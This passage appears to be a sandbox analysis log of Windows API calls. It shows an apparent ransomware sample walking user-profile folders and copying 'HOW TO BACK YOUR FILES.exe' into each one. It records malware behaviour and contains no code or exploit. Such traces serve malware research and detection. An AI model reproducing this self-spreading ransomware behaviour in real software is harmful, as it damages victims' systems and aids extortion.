lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0078.800] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.800] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.801] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.801] GetLastError () returned 0x0 [0078.801] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.801] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.801] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.802] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.802] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History" [0078.802] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History" [0078.802] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.802] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.802] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.803] GetLastError () returned 0x0 [0078.803] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.803] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.803] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.803] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.803] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low" [0078.803] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low" [0078.803] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.803] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.804] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.804] GetLastError () returned 0x0 [0078.804] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.804] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.804] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.804] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.804] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0078.805] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0078.805] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.805] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.806] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.807] GetLastError () returned 0x0 [0078.807] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.807] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.807] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.807] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.807] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data" [0078.807] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data" [0078.807] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.807] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.808] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.808] GetLastError () returned 0x0 [0078.808] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.808] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.808] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.808] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.809] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0078.809] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0078.809] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.809] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.809] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.809] GetLastError () returned 0x0 [0078.810] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.810] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.810] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.810] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.810] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0078.810] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0078.810] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.810] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.811] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.811] GetLastError () returned 0x0 [0078.811] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.811] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.811] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.811] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.812] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0078.812] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0078.812] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.812] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.812] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.812] GetLastError () returned 0x0 [0078.813] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.813] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.813] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.813] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.813] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.813] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.813] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.813] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.814] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.814] GetLastError () returned 0x0 [0078.814] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.814] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.814] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.814] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.814] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.815] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.815] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.815] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.815] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.815] GetLastError () returned 0x0 [0078.816] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.816] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.816] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.816] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.816] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.816] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and 